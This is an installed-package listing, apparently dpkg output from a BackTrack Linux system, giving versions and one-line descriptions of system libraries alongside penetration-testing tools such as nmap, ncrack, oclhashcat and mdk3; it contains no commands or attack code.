ii libxfixes3
1:4.0.4-1
X11 miscellaneous 'fixes' extension library
ii libxfont1
X11 font rasterisation library

1:1.4.1-1

ii libxft2
2.1.14-1ubuntu1
FreeType-based font drawing library for X
ii libxi6
X11 Input extension library

2:1.3-3

ii libxine1
1.1.17-1ubuntu3
the xine video/media player library, meta-package
ii libxine1-bin
1.1.17-1ubuntu3
the xine video/media player library, binary files
ii libxine1-console
1.1.17-1ubuntu3
libaa/libcaca/framebuffer/directfb related plugins for libxine1
ii libxine1-misc-plugins
1.1.17-1ubuntu3
Input, audio output and post plugins for libxine1
ii libxine1-x
1.1.17-1ubuntu3
X desktop video output plugins for libxine1

ii libxinerama1
X11 Xinerama extension library

2:1.1-2

ii libxkbfile1
X11 keyboard file manipulation library

1:1.0.6-1

ii libxklavier16
X Keyboard Extension high-level API

5.0-0ubuntu1

ii libxml-libxml-perl
Perl interface to the libxml2 library

1.70.ds-1

ii libxml-namespacesupport-perl
1.09-3
Perl module for supporting simple generic namespaces
ii libxml-parser-perl
Perl module for parsing XML files

2.36-1.1build3

ii libxml-sax-expat-perl
0.40-1
Perl module for a SAX2 driver for Expat (XML::Parser)
ii libxml-sax-perl
0.96+dfsg-2
Perl module for using and building Perl SAX2 XML processors
ii libxml-simple-perl
Perl module for reading and writing XML

2.18-3

ii libxml-twig-perl
1:3.32-3ubuntu1
Perl module for processing huge XML documents in tree mode
ii libxml-writer-perl
Perl module for writing XML documents

0.605-1

ii libxml-xpath-perl
Perl module for processing XPath

1.13-7

ii libxml2
GNOME XML library

2.7.6.dfsg-1ubuntu1.1

ii libxml2-dev
2.7.6.dfsg-1ubuntu1.1
Development files for the GNOME XML library
ii libxml2-utils
XML utilities

2.7.6.dfsg-1ubuntu1.1

ii libxmu6
X11 miscellaneous utility library

2:1.0.5-1

ii libxmuu1
X11 miscellaneous micro-utility library

2:1.0.5-1

ii libxpm4
X11 pixmap library

1:3.5.8-1

ii libxrandr2
X11 RandR extension library

2:1.3.0-3

ii libxrender1
X Rendering Extension client library

1:0.9.5-1

ii libxres1
X11 Resource extension library

2:1.0.4-1

ii libxslt1-dev
1.1.26-1ubuntu1
XSLT processing library - development kit
ii libxslt1.1
1.1.26-1ubuntu1
XSLT processing library - runtime library
ii libxss1
X11 Screen Saver extension library

1:1.2.0-2

ii libxt-dev
1:1.0.7-1
X11 toolkit intrinsics library (development headers)
ii libxt6
X11 toolkit intrinsics library

1:1.0.7-1

ii libxtst6
2:1.1.0-2
X11 Testing -- Resource extension library
ii libxv1
X11 Video extension library

2:1.0.5-1

ii libxvmc1
X11 Video extension library

2:1.0.5-1ubuntu1

ii libxxf86dga1
2:1.1.1-2
X11 Direct Graphics Access extension library
ii libxxf86misc1
1:1.0.2-1
X11 XFree86 miscellaneous extension library
ii libxxf86vm1
1:1.1.0-2
X11 XFree86 video mode extension library
ii libyaml-0-2
0.1.3-1
Fast YAML 1.1 parser and emitter library
ii libyaml-perl
YAML Ain't Markup Language

0.71-1

ii libyaml-syck-perl
1.07-1build1
fast, lightweight YAML loader and dumper
ii linux-firmware
Linux Kernel Firmware

2.0-bt4

ii linux-image
1.1-bt1
BackTrack Linux Kernel Image Virtual Package
rc linux-image-2.6.32-28-generic-pae
2.6.32-28.55
Linux kernel image for version 2.6.32 on x86
ii linux-image-2.6.38
2.6.38-10.00.Custom
Linux kernel binary image for version 2.6.38
rc linux-image-2.6.38-rc7
2.6.38-rc7-10.00.Custom
Linux kernel binary image for version 2.6.38-rc7
rc linux-image-2.6.38-rc8
2.6.38-rc8-10.00.Custom
Linux kernel binary image for version 2.6.38-rc8
ii linux-libc-dev
Linux Kernel Headers for development

2.6.32-29.58

ii linux-sound-base
1.0.22.1+dfsg-0ubuntu3
base package for ALSA and OSS sound systems
ii linux-source
1.1-bt1
BackTrack Linux Kernel Source Virtual Package
ii linux-source-2.6.38
2.6.38-10.00.Custom
Linux kernel source for version 2.6.38
rc linux-source-2.6.38-rc7
2.6.38-rc7-10.00.Custom
Linux kernel source for version 2.6.38-rc7
rc linux-source-2.6.38-rc8
2.6.38-rc8-10.00.Custom
Linux kernel source for version 2.6.38-rc8
ii list-urls
Extract URLS from a web page.

3.0-bt2

ii lm-sensors
1:3.1.2-2
utilities to read temperature/voltage/fan sensors
ii lmodern
2.004.1-3
scalable PostScript and OpenType fonts based on Computer Modern
ii localechooser-data
2.12ubuntu3
Lists of locales supported by the installer
ii locales
common files for locale support

2.11+git20100304-3

ii lockfile-progs
0.1.13ubuntu1
Programs for locking and unlocking files and mailboxes
ii login
system login tools

1:4.1.4.2-1ubuntu2.2

ii logrotate
Log rotation utility

3.7.8-4ubuntu2.1

ii lsb-base
4.0-0ubuntu8
Linux Standard Base 4.0 init script functionality

ii lsb-release
4.0-0ubuntu8
Linux Standard Base version reporting utility
ii lshw
02.14-1build1
information about hardware configuration
ii lsof
List open files

4.81.dfsg.1-1build1

ii ltrace
0.5.3-2ubuntu3
Tracks runtime library calls in dynamically linked programs
ii luatex
next generation TeX engine

0.50.0-1

ii lzma
4.43-14ubuntu2
Compression method of 7z format in 7-Zip program
ii m4
a macro processing language

1.4.13-3

ii macchanger
1.5.0-bt2
A GNU/Linux utility for viewing/manipulating the MAC address of network
interfaces.
ii magicrescue
1.19-bt0
Scans a block device for file types it knows how to recover and calls an
external program to extract them.
ii magictree
r1492-bt1
A penetration tester productivity tool which allows easy and straightforward
data consolidation
ii make
An utility for Directing compilation.

3.81-7ubuntu1

ii makedev
creates device files in /dev

2.3.1-89ubuntu1

ii maltego
OSINT software

3.0-bt4

ii man-db
on-line manual pager

2.5.7-2ubuntu1

ii manpages
3.23-1
Manual pages about using a GNU/Linux system
ii manpages-dev
3.23-1
Manual pages about using GNU/Linux for development
ii

mantra

0.01-bt0

Mantra is a security framework which can be very helpful in performing all the
five phases of attacks including reconnaissance, scanning and enumeration,
ii mawk
1.3.3-15ubuntu2
a pattern scanning and text processing language
ii md5deep
3.4-bt0
A set of programs to compute MD5, SHA-1, SHA-256, Tiger, or Whirlpool message
digests on an arbitrary number of files.
ii mdbtools
JET / MS Access database (MDB) tools

0.5.99.0.6pre1.0.20051109-6

ii mdk3
6.0-bt1
MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol
weaknesses using the oslib of aircrack-ng.
ii medusa
parallel network login auditor

2.0-bt4

ii memtest86+
thorough real-mode memory tester

4.00-2ubuntu3

ii menu
2.1.43ubuntu1
generates programs menu for all menu-aware applications
ii mesa-utils
Miscellaneous Mesa GL utilities

7.7.1-1ubuntu3

ii metacity
lightweight GTK+ window manager

1:2.30.1-0ubuntu1.1

ii metacity-common
1:2.30.1-0ubuntu1.1
shared files for the Metacity window manager
ii metagoofil
2.0-bt1
Metagoofil is a tool for extracting metadata of public documents
(pdf,doc,xls,ppt) availables in the target websites.
ii mime-support
3.48-1ubuntu1
MIME files 'mime.types' & 'mailcap', and support programs
ii min12xxw
0.0.9-3ubuntu2
Printer driver for KonicaMinolta PagePro 1[234]xxW
ii mingw
3.14-bt0
A minimalist development environment for native Microsoft Windows
applications.
ii miranda
1.0-bt0
Miranda is a Python-based Universal Plug-N-Play client application designed to
discover, query and interact with UPNP devices, particularly Internet Gatew
ii

miredo

1.2.3-bt5

Miredo is an open-source Teredo IPv6 tunneling software, for Linux and the BSD
operating systems. It includes functional implementations of all components
ii missidentify
1.0-bt0
Miss Identify is a program to find Win32 applications.
ii mlocate
0.22.2-1ubuntu1
quickly find files on the filesystem based on their name
ii module-init-tools
tools for managing Linux kernel modules

3.11.1-2ubuntu1

ii mopest
PHP web vulnerability scanner.

2.0-bt0

ii mork.pl
1.0-bt0
This script lets you extract the URLs from your Mozilla history file, sorted
by last access time.
ii mount
2.17.2-0ubuntu1.10.04.2
Tools for mounting and manipulating filesystems
ii mountall
filesystem mounting tool

2.15.3

ii mousetweaks
2.30.0-0ubuntu1
mouse accessibility enhancements for the GNOME desktop
ii mpg123
MPEG layer 1/2/3 audio player

1.12.1-0ubuntu1

ii mtools
Tools for manipulating MSDOS files

4.0.10-1ubuntu1

ii mtr-tiny
Full screen ncurses traceroute tool

0.75-2build1

ii mutter
lightweight GTK+ window manager

2.28.1~git20091208-1ubuntu7

ii mutter-common
2.28.1~git20091208-1ubuntu7
shared files for the Mutter window manager
ii mysql-client-5.1
MySQL database client binaries

5.1.41-3ubuntu12.10

ii mysql-client-core-5.1
MySQL database core client binaries

5.1.41-3ubuntu12.10

ii mysql-common
5.1.41-3ubuntu12.10
MySQL database common files (e.g. /etc/mysql/my.cnf)
ii mysql-server
5.1.41-3ubuntu12.10
MySQL database server (metapackage depending on the latest version)

ii mysql-server-5.1
MySQL database server binaries

5.1.41-3ubuntu12.10

ii mysql-server-core-5.1
MySQL database core server files

5.1.41-3ubuntu12.10

ii nano
2.2.2-1
small, friendly text editor inspired by Pico
ii nasm
General-purpose x86 assembler

2.07-1

ii nautilus
1:2.31.1-0ubuntu2~ppa92
file manager and graphical shell for GNOME
ii nautilus-data
data files for nautilus

1:2.31.1-0ubuntu2~ppa92

ii nbtscan
1.5.1a-bt2
NBTscan is a program for scanning IP networks for NetBIOS name information.
ii ncrack
0.4-bt0
Ncrack is a high-speed network authentication cracking tool.
ii ncurses-base
basic terminal type definitions

5.7+20090803-2ubuntu3

ii ncurses-bin
terminal-related programs and man pages

5.7+20090803-2ubuntu3

ii nessus
Nessus vulnerability scanner by Tenable

4.4.1-bt5

ii net-tools
The NET-3 networking toolkit

1.60-23ubuntu2

ii netbase
Basic TCP/IP networking system

4.35ubuntu3

ii netcat
1.10-38
TCP/IP swiss army knife -- transitional package
ii netcat-traditional
TCP/IP swiss army knife

1.10-38

ii netdiscover
0.3beta6-bt4
Netdiscover is an active/passive address reconnaissance tool, mainly developed
for those wireless networks without dhcp server, when you are wardriving. I
ii netifera
1.0-bt4
Netifera is a new modular open source platform for creating network security
tools.

ii netmask
Tool for generating terse netmasks.

2.3.10-bt3

ii netpbm
2:10.0-12.1ubuntu1
Graphics conversion tools between image formats
ii nfs-common
1:1.2.0-4ubuntu4.1
NFS support files common to client and server
ii ngrep
grep for network traffic

1.45.ds2-9

ii nikto
2.1.4-bt4
Nikto is an Open Source (GPL) web server scanner which performs comprehensive
tests against web servers for multiple items, including over 6400 potentiall
ii nmap
NMAP port and vulnerability scanner

5.51-bt8

ii notification-daemon
0.4.0-2ubuntu2
a daemon that displays passive pop-up notifications
ii  ntfs-3g  1:2010.3.6-1ubuntu1  read-write NTFS driver for FUSE
ii  ntfsprogs  2.0.0-1ubuntu4  tools for doing neat things in NTFS partitions from Linux
ii  ntpdate  1:4.2.4p8+dfsg-1ubuntu2.1  client for setting system time from NTP servers
ii  obex-data-server  0.4.5-1  D-Bus service for OBEX client and server side functionality
ii  obexd  0.40-bt0  OBEX connectivity. Client and Server.
ii  obexftp  0.23-1  file transfer utility for devices that use the OBEX protocol
ii  oclhashcat  0.25-bt0  GPU based password cracker with nvidia and ati support
ii  oclhashcat+  0.04-bt2  GPU based password cracker with crypt md5, DES and Apache MD5 support and an enhanced rule engine.
ii  oclhashcat-lite  0.05-bt0  Very fast single hash GPU based password cracker
ii  ohrwurm  0.1-bt0  ohrwurm is a simple RTP fuzzer.
ii  oinkmaster  2.0-2ubuntu1  Snort rules manager
ii  ollydbg  2.01-bt2  Windows Debugger Ollydbg 2.01
ii  onesixtyone  0.3.2-bt4  Fast SNMP scanner and bruteforce tool
ii  openjdk-6-jdk  6b20-1.9.7-0ubuntu1~10.04.1  OpenJDK Development Kit (JDK)
ii  openjdk-6-jre  6b20-1.9.7-0ubuntu1~10.04.1  OpenJDK Java runtime, using Hotspot JIT
ii  openjdk-6-jre-headless  6b20-1.9.7-0ubuntu1~10.04.1  OpenJDK Java runtime, using Hotspot JIT (headless)
ii  openjdk-6-jre-lib  6b20-1.9.7-0ubuntu1~10.04.1  OpenJDK Java runtime (architecture independent libraries)
ii  openssh-client  1:5.3p1-3ubuntu6  secure shell (SSH) client, for secure access to remote machines
ii  openssh-server  1:5.3p1-3ubuntu6  secure shell (SSH) server, for secure access from remote machines
ii  openssl  0.9.8k-7ubuntu8.6  Secure Socket Layer (SSL) binary and related cryptographic tools
ii  openssl-blacklist  0.5-2  list of blacklisted OpenSSL RSA keys
ii  openvpn  2.1.0-1ubuntu1.1  virtual private network daemon
ii  openvpn-blacklist  0.4  list of blacklisted OpenVPN RSA shared keys
ii  ophcrack  3.3.0-1  Microsoft Windows password cracker using rainbow tables (gui)
ii  os-prober  1.38  utility to detect other OSes on a set of drives
ii  osvdb  1.0-bt1  Firefox link to osvdb.org.
ii  p0f  2.0.8-bt0  A versatile passive OS fingerprinting tool.
ii  p7zip  9.04~dfsg.1-1  7zr file archiver with high compression ratio
ii  p7zip-full  9.04~dfsg.1-1  7z and 7za file archivers with high compression ratio
ii  pack  0.0.2-bt0  Password Analysis and Cracking Toolkit
ii  padbuster  0.3-bt1  PadBuster is a Perl script for automating Padding Oracle Attacks.
ii  parted  2.2-5ubuntu5.1  The GNU Parted disk partition resizing program
ii  pasco  1.0+20040505-5  An Internet Explorer cache forensic analysis tool
ii  passwd  1:4.1.4.2-1ubuntu2.2  change and administer password and group data
ii  patch  2.6-2ubuntu1  Apply a diff file to an original
ii  pbnj  2.04-bt4  PBNJ is a suite of tools to monitor changes on a network over time. It does this by checking for changes on the target machine(s), which includes the deta
ii  pciutils  1:3.0.0-4ubuntu17  Linux PCI Utilities
ii  pcscd  1.5.3-1ubuntu4.2  Middleware to access a smart card using PC/SC (daemon side)
ii  pdf-parser  0.3.7-bt1  This tool will parse a PDF document to identify the fundamental elements used in the analyzed file.
ii  pdfbook  1.0-bt0  Script to gather facebook artifacts from a pd process memory dump.
ii  pdfid  0.0.11-bt0  Will scan a file to look for certain PDF keywords.
ii  pdgmail  0.2.0-bt0  Script to gather gmail artifacts from a pd process memory dump.
ii  peepdf  0.1-bt1  peepdf is a Python tool to explore PDF files in order to find out if the file can be harmful or not.
ii  perl  5.10.1-8ubuntu2.1  Larry Wall's Practical Extraction and Report Language
ii  perl-base  5.10.1-8ubuntu2.1  minimal Perl system
ii  perl-cisco-copyconfig  1.4-bt2  Provides methods for manipulating the running-config of devices running IOS via SNMP directed TFTP.
ii  perl-doc  5.10.1-8ubuntu2.1  Perl documentation
ii  perl-modules  5.10.1-8ubuntu2.1  Core Perl modules
ii  perl-number-bytes-human  0.07-bt1  Perl module for stuff
ii  perl-tk  1:804.028-6  Perl module providing the Tk graphics library
ii  phonon  4:4.7.0really4.4.2-0ubuntu1~lucid1~ppa1  metapackage for the Phonon multimedia framework
ii  phonon-backend-xine  4:4.7.0really4.4.2-0ubuntu1~lucid1~ppa1  Phonon Xine 1.1.x backend
ii  php5  5.3.2-1ubuntu4.9  server-side, HTML-embedded scripting language (metapackage)
ii  php5-cli  5.3.2-1ubuntu4.9  command-line interpreter for the php5 scripting language
ii  php5-common  5.3.2-1ubuntu4.9  Common files for packages built from the php5 source
ii  php5-mysql  5.3.2-1ubuntu4.9  MySQL module for php5
ii  php5-sqlite  5.3.2-1ubuntu4.9  SQLite module for php5
ii  pkg-config  0.22-1build2  manage compile and link flags for libraries
ii  plecost  0.2.2-9beta-bt1  Wordpress finger printer tool, plecost search and retrieve information about the plugins versions installed in Wordpress systems.
ii  plymouth  0.8.2-2ubuntu2.2  graphical boot animation and logger - main package
ii  plymouth-label  0.8.2-2ubuntu2.2  graphical boot animation and logger - label control
ii  plymouth-theme-script  0.8.2-2ubuntu2.2  graphical boot animation and logger - script theme
ii  plymouth-theme-ubuntu-text  0.8.2-2ubuntu2.2  graphical boot animation and logger - ubuntu-logo theme
ii  plymouth-x11  0.8.2-2ubuntu2.2  graphical boot animation and logger - X11 interface
ii  pm-utils  1.3.0-1ubuntu3  utilities and scripts for power management
ii  pnm2ppa  1.13-0ubuntu1  PPM to PPA converter
ii  po-debconf  1.0.16  tool for managing templates file translations with gettext
ii  policykit-1  0.96-2ubuntu0.1  framework for managing administrative policies and privileges
ii  policykit-1-gnome  0.96-2ubuntu2  GNOME authentication agent for PolicyKit-1
ii  poppler-utils  0.12.4-0ubuntu5.1  PDF utilities (based on libpoppler)
rc  popularity-contest  1.48ubuntu1  Vote for your favourite packages automatically
ii  portaudio19-dev  19+svn20090620-0ubuntu2  Portable audio I/O - development files
ii  portmap  6.0.0-1ubuntu2.1  RPC port mapper
ii  powerfuzzer  1.0beta-bt1  Powerfuzzer is a highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer).
ii  powermgmt-base  1.31  Common utils and configs for power management
ii  ppp  2.4.5~git20081126t100229-0ubuntu3  Point-to-Point Protocol (PPP) - daemon
ii  pppconfig  2.3.18ubuntu2  A text menu based utility for configuring ppp
ii  pppoeconf  1.19ubuntu1  configures PPPoE/ADSL connections
ii  pref.pl  1.0-bt0  Parses Prefetch files
ii  procps  1:3.2.8-1ubuntu4  /proc file system utilities
ii  protos-sip  r2-bt1  Evaluate implementation level security and robustness of SIP
ii  proxychains  3.1-bt2  a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy. Support
ii  proxytunnel  1.9.0-bt3  Connecting outside through HTTP(S) proxies
ii  psfontmgr  0.11.10-4ubuntu1  PostScript font manager -- part of Defoma, Debian Font Manager
ii  psmisc  22.10-1  utilities that use the proc file system
ii  psutils  1.17-27  A collection of PostScript document handling utilities
ii  ptk  2.0-bt2  PTK forensics is a computer forensic framework for the command line tools in the SleuthKit plus much more software modules.
ii  ptunnel  0.71-bt2  Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as
ii  pulseaudio  1:0.9.22~0.9.21+stable-queue-32g8478-0ubuntu14.1  PulseAudio sound server
ii  pulseaudio-esound-compat  1:0.9.22~0.9.21+stable-queue-32g8478-0ubuntu14.1  PulseAudio ESD compatibility layer
ii  pulseaudio-module-x11  1:0.9.22~0.9.21+stable-queue-32g8478-0ubuntu14.1  X11 module for PulseAudio sound server
ii  pulseaudio-utils  1:0.9.22~0.9.21+stable-queue-32g8478-0ubuntu14.1  Command line tools for the PulseAudio sound server
ii  pwnat  0.3beta-bt4  A tool that allows any number of clients behind NATs to communicate with a server behind a separate NAT.
ii  pwntcha  rev4780-bt3  PWNtcha stands for "Pretend We're Not a Turing Computer but a Human Antagonist", as well as PWN capTCHAs. This project's goal is to demonstrate the in
ii  pyscard  1.6.12-bt1  pyscard is a python module adding smart cards support to python.
ii  pyserial  2.5-bt0  Multiplatform Serial Port Module for Python (Win32, Jython, Linux, BSD and more)
ii  python  2.6.5-0ubuntu1  An interactive high-level object-oriented language (default version)
ii  python-apport  1.13.3-0ubuntu2  apport crash report handling library
ii  python-apt  0.7.94.2ubuntu6.2  Python interface to libapt-pkg
ii  python-beautifulsoup  3.1.0.1-2build1  error-tolerant HTML parser for Python
ii  python-cairo  1.8.8-1  Python bindings for the Cairo vector graphics library
ii  python-central  0.6.15ubuntu1  register and build utility for Python packages
ii  python-clientform  0.2.10-2.1  module for handling HTML forms on the client side
ii  python-crypto  2.0.1+dfsg1-4ubuntu2  cryptographic algorithms and protocols for Python
ii  python-dbus  0.83.0-1ubuntu3  simple interprocess messaging system (Python interface)
ii  python-distutils-extra  2.18bzr1  enhancements to the Python build system
ii  python-dnspython  1.7.1-1ubuntu0.1  DNS toolkit for Python
ii  python-dpkt  1.6+svn54-1  Python packet creation / parsing module
ii  python-dumbnet  1.12-3  A dumb, portable networking library -- python bindings
ii  python-extractor  1:0.5-7  extracts meta-data from files of arbitrary type (Python bindings)
ii  python-fpconst  0.7.2-4  Utilities for handling IEEE 754 floating point special values
ii  python-gconf  2.28.0-1ubuntu1  Python bindings for the GConf configuration database system
ii  python-gdbm  2.6.5-0ubuntu2  GNU dbm database support for Python
ii  python-geoip  1.2.4-2ubuntu1  Python bindings for the GeoIP IP-to-country resolver library
ii  python-glade2  2.17.0-0ubuntu2  GTK+ bindings: Glade support
ii  python-gmenu  2.30.0-0ubuntu4  an implementation of the freedesktop menu specification for GNOME
ii  python-gnome2  2.28.0-1ubuntu1  Python bindings for the GNOME desktop environment
ii  python-gnomeapplet  2.30.0-0ubuntu1.1  Python bindings for the GNOME panel applet library
ii  python-gnomecanvas  2.28.0-1ubuntu1  Python bindings for gnomecanvas (debug extension)
ii  python-gnupginterface  0.3.2-9.1  Python interface to GnuPG (GPG)
ii  python-gnuplot  1.8-1.1  A Python interface to the gnuplot plotting program
ii  python-gobject  2.21.1-0ubuntu3  Python bindings for the GObject library
ii  python-gtk2  2.17.0-0ubuntu2  Python bindings for the GTK+ widget set
ii  python-gtksourceview2  2.10.1-0ubuntu1  Python bindings for the GtkSourceView widget
ii  python-httplib2  0.6.0-1  comprehensive HTTP client library written in Python
ii  python-imaging  1.1.7-1ubuntu0.1  Python Imaging Library
ii  python-imaging-tk  1.1.7-1ubuntu0.1  Python Imaging Library - ImageTk Module
ii  python-impacket  0.9.6.0-3  Python module to easily build and dissect network protocols
ii  python-iniparse  0.3.1-1  Module to access and modify configuration data in INI files
ii  python-launchpadlib  1.6.0-0ubuntu1  Launchpad web services client library
ii  python-lazr.restfulclient  0.9.11-1ubuntu1.1  client for lazr.restful-based web services
ii  python-lazr.uri  1.0.2-1  library for parsing, manipulating, and generating URIs
ii  python-libxml2  2.7.6.dfsg-1ubuntu1.1  Python bindings for the GNOME XML library
ii  python-lightblue  0.3.2-1ubuntu1  cross-platform Bluetooth API for Python
ii  python-lxml  2.2.4-1  pythonic binding for the libxml2 and libxslt libraries
ii  python-minimal  2.6.5-0ubuntu1  A minimal subset of the Python language (default version)
ii  python-netaddr  0.7.4-1  manipulation of various common network address notations
ii  python-newt  0.52.10-5ubuntu1  A NEWT module for Python
ii  python-nltk  2.0~b8-0ubuntu1  Python libraries for natural language processing
ii  python-notify  0.1.1-2build3  Python bindings for libnotify
ii  python-numpy  1:1.3.0-3build1  Numerical Python adds a fast array facility to the Python language
ii  python-oauth  1.0a~svn1124-0ubuntu2  implementation of the OAuth protocol
ii  python-openssl  0.10-1  Python wrapper around the OpenSSL library
ii  python-pam  0.4.2-12.1ubuntu1  A Python interface to the PAM library
ii  python-pcapy  0.10.6-1ubuntu2  Python interface to the libpcap packet capture library
ii  python-pefile  1.2.9.1-1  Portable Executable (PE) parsing module for Python
ii  python-pexpect  2.3-1build1  Python module for automating interactive applications
ii  python-pkg-resources  0.6.10-4ubuntu1  Package Discovery and Resource Access using pkg_resources
ii  python-problem-report  1.13.3-0ubuntu2  Python library to handle problem reports
ii  python-psyco  1.6-1ubuntu2  Python specializing compiler
ii  python-ptrace  0.6.3-bt0  Python binding of ptrace library
ii  python-pyasn1  0.0.8a-1  ASN.1 library for Python
ii  python-pybonjour  1.1.1-bt4  pybonjour provides a pure-Python interface to Apple Bonjour and compatible DNSSD libraries (such as Avahi).
ii  python-pycurl  7.19.0-3  Python bindings to libcurl
ii  python-pydot  1.0.2-1  Python interface to Graphviz's dot
ii  python-pyicu  0.9-2  Python extension wrapping the ICU C++ API
ii  python-pymssql  1.0.2+dfsg-1  Python database access for MS SQL server and Sybase
ii  python-pyorbit  2.24.0-5ubuntu3  A Python language binding for the ORBit2 CORBA implementation
ii  python-pyparsing  1.5.2-1ubuntu1  Python parsing module
ii  python-pypcap  1.1.2+debian-2ubuntu1  object-oriented Python interface for libpcap
ii  python-pyx  0.10-1ubuntu3  Python module for generating PostScript graphics
ii  python-qt3  3.18.1-4ubuntu1  Qt3 bindings for Python
ii  python-qt4  4.7.3-1ubuntu2~lucid1~ppa3  Python bindings for Qt4
ii  python-scipy  0.7.0-2ubuntu0.1  scientific tools for Python
ii  python-serial  2.3-1  pyserial - module encapsulating access for the serial port
ii  python-simplejson  2.0.9-1build1  Simple, fast, extensible JSON encoder/decoder for Python
ii  python-sip  4.10.2-1ubuntu1~lucid1~ppa1  Python/C++ bindings generator runtime library
ii  python-smartpm  1.2-5  Python library of the Smart Package Manager
ii  python-soappy  0.12.0-4  SOAP Support for Python
ii  python-support  1.0.4ubuntu1  automated rebuilding support for Python modules
ii  python-svn  1.7.2-2ubuntu1  A(nother) Python interface to Subversion
ii  python-tk  2.6.5-0ubuntu2  Tkinter - Writing Tk applications with Python
ii  python-twisted-bin  10.0.0-2ubuntu2  Event-based framework for internet applications
ii  python-twisted-core  10.0.0-2ubuntu2  Event-based framework for internet applications
ii  python-twisted-web  10.0.0-1  An HTTP protocol implementation together with clients and servers
ii  python-utidylib  0.2-3.2ubuntu2  Python wrapper for TidyLib
ii  python-wadllib  1.1.4-1ubuntu1  Python library for navigating WADL files
ii  python-wicd  1.7.0+ds1-2  wired and wireless network manager - Python module
ii  python-wxgtk2.8  2.8.10.1-0ubuntu1.2  wxWidgets Cross-platform C++ GUI toolkit (wxPython binding)
ii  python-wxversion  2.8.10.1-0ubuntu1.2  wxWidgets Cross-platform C++ GUI toolkit (wxPython version selector)
ii  python-xdg  0.18-1ubuntu2  Python library to access freedesktop.org standards
ii  python-xkit  0.4.2.2  library for the manipulation of the xorg.conf
ii  python-yaml  3.09-2build1  YAML parser and emitter for Python
ii  python-zope.interface  3.5.3-1ubuntu2  Interfaces for Python
ii  python2  2.7.1-bt2  Python 2.7.1
ii  python2.6  2.6.5-1ubuntu6  An interactive high-level object-oriented language (version 2.6)
ii  python2.6-minimal  2.6.5-1ubuntu6  A minimal subset of the Python language (version 2.6)
ii  python3  3.1.2-0ubuntu1  An interactive high-level object-oriented language (default python3 version)
ii  python3-minimal  3.1.2-0ubuntu1  A minimal subset of the Python language (default python3 version)
ii  python3.1  3.1.2-0ubuntu3  An interactive high-level object-oriented language (version 3.1)
ii  python3.1-minimal  3.1.2-0ubuntu3  A minimal subset of the Python language (version 3.1)
ii  pyxplot  0.7.1+1-1  data plotting program producing publication-quality output
ii  r8187-driver  26.1010.0622.2006-bt0  Patched IEEE r8187 drivers for 2.6.38
ii  radeontool  1.6.1-0ubuntu1  utility to control ATI Radeon backlight functions on laptops
ii  rake  0.8.7-1  a ruby build program
ii  rar  1:3.9.b2-1  Archiver for .rar files
ii  rarian-compat  0.8.1-4ubuntu1  Documentation meta-data library (compatibility tools)
ii  rdate  1:1.2-4build1  sets the system's date from a remote host
ii  rdesktop  1.6.0-2ubuntu3  RDP client for Windows NT/2000 Terminal Server
ii  rdoc1.8  1.8.7.249-2  Generate documentation from Ruby source files (for Ruby 1.8)
ii  rdoc1.9.2  1.9.2.z1-1ppa1~lucid  Generate documentation from Ruby source files (for Ruby 1.9.2)
ii  readline-common  6.1-1  GNU readline and history libraries, common files
ii  readpst  0.6.41-bt0  Utility which can convert email messages to both mbox and MH mailbox formats.
ii  recordmydesktop  0.3.8.1+svn602-1ubuntu1  Captures audio-video data of a Linux desktop session
ii  recordmydesktop-bt  1.0-bt1  Launcher of RecordMyDesktop for BackTrack Report-Tools.
ii  recoverjpeg  2.0-bt0  A tool to recover lost files on damaged memory cards or USB drives.
ii  reglookup  0.12.0-bt0  RegLookup is a small command line utility for reading and querying Windows NT-based registries.
ii  reiserfsprogs  1:3.6.21-1build1  User-level tools for ReiserFS filesystems
ii  revhosts  2.0-bt3  Vhost enumeration and hacking tool
ii  rfidiot  1.0a-bt4  RFIDIOt is an open source python library for exploring RFID devices
ii  rfuzz  0.9-bt2  RFuzz is a Ruby library to easily test web applications from the outside using a fast HttpClient and wicked evil RandomGenerator allowing the average prog
ii  ri  4.2-2~uorppa0  Ruby Interactive reference (ri)
ii  ri1.8  1.8.7.249-2  Ruby Interactive reference (for Ruby 1.8)
ii  ri1.9.2  1.9.2.z1-1ppa1~lucid  Ruby Interactive reference (for Ruby 1.9.2)
ii  rifiuti  1.0+20040505-4  A MS Windows recycle bin analysis tool
ii  rinetd  0.62-5.1  Internet TCP redirection server
ii  rkhunter  1.3.8-bt1  This tool scans for rootkits, backdoors and local exploits.
ii  rpm-common  4.7.2-1lbuild1  common files for RPM
ii  rrdtool  1.3.8-1ubuntu1  Time-series data storage and display system (programs)
ii  rsync  3.0.7-1ubuntu1.1  fast remote file copy program (like rcp)
ii  rsyslog  4.2.0-2ubuntu8.1  enhanced multi-threaded syslogd
ii  rtkit  0.6-0ubuntu1  Realtime Policy and Watchdog Daemon
ii  rtpbreak  1.3a-bt2  With rtpbreak you can detect, reconstruct and analyze any RTP session.
ii  rtpflood  1.0-bt0  Command line tool used to flood any device processing RTP.
ii  rtpinject  1.0-bt1  RTP (Voip) injection tool
ii  rtpinsertsound  3.0-bt1  RTP (Voip) security tool
ii  rtpmixsound  3.0-bt1  RTP (Voip) security tool
ii  ruby  4.2-2~uorppa0  An interpreter of object-oriented scripting language Ruby
ii  ruby-dev  4.2-2~uorppa0  Header files for compiling extension modules for Ruby
ii  ruby1.8  1.8.7.249-2  Interpreter of object-oriented scripting language Ruby 1.8
ii  ruby1.8-dev  1.8.7.249-2  Header files for compiling extension modules for the Ruby 1.8
ii  ruby1.9.2  1.9.2.z1-1ppa1~lucid  Interpreter of object-oriented scripting language Ruby 1.9.2
ii  ruby1.9.2-dev  1.9.2.z1-1ppa1~lucid  Header files for compiling extension modules for the Ruby 1.9.2
ii  rubygems  1.3.7-1~uorppa0  package management framework for Ruby libraries/applications
ii  rubygems1.8  1.3.7-1~uorppa0  package management framework for Ruby libraries/applications
ii  rubygems1.9.2  1.3.7-1~uorppa0  package management framework for Ruby libraries/applications
ii  safecopy  1.6-bt0  A data recovery tool which tries to extract as much data as possible from a problematic source.
ii  samba-common  2:3.4.7~dfsg-1ubuntu3.6  common files used by both the Samba server and client
ii  samba-common-bin  2:3.4.7~dfsg-1ubuntu3.6  common files used by both the Samba server and client
ii  samdump  1.0-bt0  Extracts a Samba-style smbpasswd file directly from an offline copy of the SAM.
